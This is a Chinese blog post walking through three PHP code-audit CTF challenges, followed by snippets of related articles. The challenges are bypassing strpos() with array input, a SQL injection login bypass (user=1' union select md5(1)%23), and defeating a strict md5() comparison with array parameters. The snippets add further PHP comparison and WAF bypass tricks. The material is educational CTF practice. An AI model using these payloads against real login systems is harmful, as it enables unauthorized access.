strpos数组绕过NULL、密码md5比较绕过、MD5函数===绕过

最新推荐文章于 2024-05-04 10:37:19 发布
最新推荐文章于 2024-05-04 10:37:19 发布
阅读量3.6k 收藏 4
点赞数
CC 4.0 BY-SA版权
分类专栏: PHP代码审计(偏基础的)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44105778/article/details/89817842
博客介绍了三种PHP函数绕过漏洞。strpos函数不能处理数组,传入数组返回null可绕过;密码md5比较绕过可利用无过滤措施,选择对应密码实现登录;MD5函数因解析不了数组返回空,可构造特定数组形式的payload绕过。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、strpos数组绕过NULL

<?php

$flag = "flag";

    if (isset ($_GET['nctf'])) {
        if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)
            echo '必须输入数字才行';
        else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE)   
            die('Flag: '.$flag);
        else
            echo '骚年,继续努力吧啊~';
    }

 ?>

定义和用法
strpos() 函数查找字符串在另一字符串中第一次出现的位置。

它不能对数组处理,如果是数组则返回null,null,也就不等于FALSE.
payload为?nctf[]=1

二、密码md5比较绕过

<?php

if($_POST[user] && $_POST[pass]) {
   mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = $_POST[user];
  $pass = md5($_POST[pass]);
  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user=' $user '"));
  if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {


      echo "<p>Logged in! Key: ntcf{**************} </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}

?>

审计源码可知,要想得到flag,只需要同时满足

($query[pw]) && (!strcasecmp($pass, $query[pw]))

$user变量我们是可以控制的,然后又没有任何过滤措施
我们就可以直接利用这个语句选择一个相应的密码给对应的pw

如果前面的用户名不存在的话
mysql_fetch_array(mysql_query(“select pw from ctf where user=’$user’”));
取到的东西就是空,然后在加上我们的md5密码,就可以实现成功登陆

strcasecmp函数,比较2个字符串,不区分大小写。如果2个字符串大小相等就返回0。

最后payload
user=1’ union select md5(1)%23&pass=1

三、MD5函数===绕过

<?php
error_reporting(0);
$flag = 'flag{test}';
if (isset($_GET['username']) and isset($_GET['password'])) {
    if ($_GET['username'] == $_GET['password'])
        print 'Your password can not be your username.';
    else if (md5($_GET['username']) === md5($_GET['password']))
        die('Flag: '.$flag);
    else
        print 'Invalid password';
}
?>

由于md5解析不了数组,返回空。

payload:?username[]=1&password[]=2

【红日Day13-CTF】特殊WAF SQL注入绕过
PZ的博客
01-20 1130
练习记录 复现代码: index.php <?php require 'config.php'; function dhtmlspecialchars($string) { if (is_array($string)) { foreach ($string as $key => $val) { $string[$key] ...
2024年网络安全最新PHP CTF常见考题的绕过技巧_str_replace函数绕过(2)
2401_84265972的博客
05-03 1246
/使用1.0就可以绕过if(MD5(GET′name′])==MD5echo $flag;echo ‘?PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。
Bugku——strpos数组绕过
热门推荐
王嘟嘟的博客
11-01 1万+
0x00 前言 不想学习,简单的做一做CTF的题目。 看到了CTF里的排名,然后好像又有了动力。 题目 0x01 start 题目说的很清楚。数组绕过。那我们来看一下源码,然后来进行测试。 &lt;?php $flag = "flag"; if (isset ($_GET['ctf'])) { if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE) ech...
BugKu strpos数组绕过
qq_45775244的博客
12-15 682
代码审计题 代码: http://123.206.87.240:9009/15.php <?php $flag = "flag"; if (isset ($_GET['ctf'])) { if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE)//① echo '必须输入数字才行'; else if (strpos ($_GET['ctf'], '#bi...
bugku strpos数组绕过
m0_52432374的博客
02-04 761
strpos数组绕过 <?php $flag = "flag"; if (isset ($_GET['ctf'])) { if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE) echo '必须输入数字才行'; else if (strpos ($_GET['ctf'], '#biubiubiu') !== FALSE) die('Flag: '.$flag); else echo '骚年,继续努力吧啊~'; } ?> strpos () 查找 “ph
代码审计-strpos数组绕过
diemozao8175的博客
08-25 2562
<?php $flag = "flag"; if (isset ($_GET['ctf'])) { if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE) echo '必须输入数字才行'; else if (strpos ($_GET['ctf'], '#biubiubiu') !== FALSE) die('Flag: '....
php intval绕过 注入,PHP代码审计片段讲解(入门代码审计、CTF必备)
weixin_36290287的博客
04-12 1897
关于本项目代码审计对于很多安全圈的新人来说,一直是一件头疼的事情,也想跟着大牛们直接操刀审计CMS?却处处碰壁:函数看不懂!漏洞原理不知道!PHP特性更不知!那还怎么愉快审计?不如化繁为简,跟着本项目先搞懂PHP中大多敏感函数与各类特性,再逐渐增加难度,直到可以吊打各类CMS~本项目讲解基于多道CTF题,玩CTF的WEB狗也不要错过(^-^)V题的源码在Github: bowu (Github),...
ctf php代码审计 绕过,Bugku CTF 之代码审计解题记录
weixin_35870524的博客
04-11 974
前言此笔记为在Bugku CTF平台上做代码审计题目的过程,也算是一篇wp吧extract变量覆盖extract($_GET):$_GET:表示在传递参数时,URL通过get的方式传参,传输的数据以数组的形式封装在$_GET中extract():从数组中将变量导入到当前的符号表。该函数使用数组键名作为变量名,数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量file_ge...
最新PHP CTF常见考题的绕过技巧_str_replace函数绕过(1)
05-04 1000
PHP中md5()函数无法处理数组(会返回NULL)==的也可以用数组绕过
---已搬运--:[0CTF 2016]piapiapia -----代码审计+字符串逃逸+数组绕过长度限制+以及一下小知识点 preg_match()用数组,而且注意if是正确判断,还是错误判断
Zero_Adam的博客
02-22 763
目录:一、知识点:1.url传入数组绕过长度限制??2.数组的遍历3.数组绕过正则二、我自己的做题尝试:三、不足:四、学习WP1.学习一个大佬的思路:2.学习 另一个大佬的思路 ---这个过于跳跃,看上一个把,,五、思路学完了,自己做做看看。 一、知识点: 1.url传入数组绕过长度限制?? 就是判断你输入字符串不能够太长的时候, 用数组可以进行绕过; 2.数组的遍历 两种遍历方法 foreach(array_expression as $value) foreach(array_expressio
PHP绕过strpos()
东隅的博客
01-31 3289
可以结合ctfshow web94 strpos(string,find,start)有三个参数,string是被检查的字符串,find是要被搜索的字符串,start是开始检索的位置,从0开始。 该函数返回查找到这个find字符串的位置,那么如果是0位置,就值得注意了 比如: if(strpos('0104','0')){ echo 'yes'; }else{ echo 'no';} 那0101里面肯定存在0对吗,但是因为返回的位置是0,那么在if判断中相当于不存在,那返回的结果反
攻防世界-warmup_mb_substr()+mb_strpos()绕过
Fisher
05-13 3563
出自:HCTF2018 打开源代码,发现存在source.php,于是访问发下如下代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; //白名单跟后续函数
bugku ctf strpos数组绕过
qq_42777804的博客
08-10 2808
<?php $flag = "flag"; if (isset ($_GET['ctf'])) { if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE) echo '必须输入数字才行'; else if (strpos ($_GET['ctf'], '#biubiubiu') !== FALSE) die('Flag: '.$flag); else...
PHP CTF常见考题的绕过技巧
m0_48108919的博客
04-07 1万+
1.===绕过 PHP比较运算符 ===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等。 只要两边字符串类型不同会返回false
strpos使用不当引发漏洞
qq_37466661的博客
08-08 1360
strpos使用不当引发漏洞
php比较绕过(强比较===”/弱比较“==“)
qq_47804678的博客
01-31 6030
当字符串被当作一个数值来处理时,如果该字符串没有包含’.’,‘e’,'E’并且其数值在整形的范围之内,该字符串作为int来取值,其他所有情况下都被作为float来取值,并且字符串开始部分决定它的取值,开始部分为数字,则其值就是开始的数字,否则,其值为0。他是判断变量是否是数字说数字字符串的函数,只有全部为数字时才能为真,但是其漏洞是:当将变量用16进制表达时,结果都为真。因为当hash开头为0e后全为数字的话,进行比较时就会将其当做科学计数法来计算,用计算出的结果来进行比较。此函数用来比较字符串。
CTF(web方向)--md5的“===”和“==”的绕过
m0_74402888的博客
04-24 1599
php是一种弱类型语言,对数据的类型要求并不严格,可以让数据类型互相转换。在php中有两种比较符号: 一种是 ==,另外一种是 ===,都是用来比较两个数值是否相等的操作符,但他们也是有区别的:== :弱等于。在比较前会先把两种字符串类型转成相同的再进行比较。简单的说,它不会比较变量类型,只比较值。=== :强等于。在比较前会先判断两种字符串类型是否相同再进行比较,如果类型不同直接返回不相等。既比较值也比较类型。
各种绕过
weixin_34368949的博客
09-05 752
各种绕过 110 各种绕过哟http://120.24.86.145:8002/web7/ <?php highlight_file('flag.php'); $_GET['id'] = urldecode($_GET['id']); $flag = 'flag{xxxxxxxxxxxxxxxxx...
PHP2:数据类型、Strlen()、Strpos()、字符串、数组、常量、运算符
LIHAO的博客
03-26 654
文章目录PHP2:数据类型、Strlen()、Strpos()、字符串、数组、常量、运算符一、数据类型:1、整形:2、浮点型:3、字符串:(1)字符串基本使用:(2)并置运算符:(3)strlen()函数:(4)strpos()函数:4、布尔型:5数组型:6、对象:7、NULL值:二、常量:1、定义常量:2、全局常量:三、运算符: PHP2:数据类型、Strlen()、Strpos()、字符串、...
pg strpos函数绕过
最新发布
03-19
在 PostgreSQL 中,`strpos()` 是用于查找子字符串在另一个字符串中的位置的内置函数。如果尝试绕过 `strpos()` 的行为或者规避其特定的结果逻辑,则需要理解该函数的工作原理以及可能的应用场景。 ### 关于 `strpos()` 函数的行为 `strpos()` 返回的是子字符串首次出现的位置索引(从 1 开始)。如果没有找到匹配项,则返回 0[^2]。这种特性使得它常被用来判断某个子串是否存在,尤其是在 SQL 查询条件中配合其他表达式一起使用。 #### 绕过的可能性分析 通常提到“绕过”,往往涉及安全上下文中讨论如何避开某些过滤机制或验证规则。对于像 `strpos()` 这样的标准数据库功能来说,“绕过”的概念并不常见,除非是在特殊情况下试图实现某种变通处理方式来达到预期效果而不直接调用此方法本身。 以下是几种可以考虑的技术方向: 1. **利用替代函数** 可以通过其他相似作用但语法不同的函数达成目的。例如: - 使用正则表达式的匹配操作代替简单的字符定位。 ```sql SELECT * FROM table WHERE column ~* '^pattern'; ``` 此处采用 POSIX 正则模式来进行更灵活复杂的搜索[^1]。 2. **调整查询结构** 如果是因为业务需求导致不得不回避使用 `strpos()` ,那么重构整个查询语句可能是更好的解决方案之一。比如改写成基于 LIKE 或 ILIKE 的形式: ```sql SELECT * FROM my_table WHERE col_name LIKE '%search_term%'; ``` 3. **自定义逻辑构建** 当遇到严格限制时,还可以创建存储过程或者编写 PL/pgSQL 脚本来模拟所需的功能并嵌套到最终执行计划里去完成任务目标。 4. **针对注入防护措施下的应对策略** 假设问题是源于防止 SQL 注入攻击而设置的各种防御手段影响到了正常开发工作流的话,应该重新审视应用程序层面上的数据输入校验流程而不是单纯依赖修改底层 DBMS 表达式来解决问题。确保所有外部传入参数都经过适当转义处理才是最根本有效的办法。 ```python def escape_input(user_data): sanitized = user_data.replace("'", "''") # 对单引号做双重化处理作为简单示范 return f"'{sanitized}'" ``` 以上提供了几个角度思考如何去间接实现原本由 `strpos()` 承载的任务职责的同时也强调了遵循最佳实践的重要性以保障系统的整体安全性与稳定性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值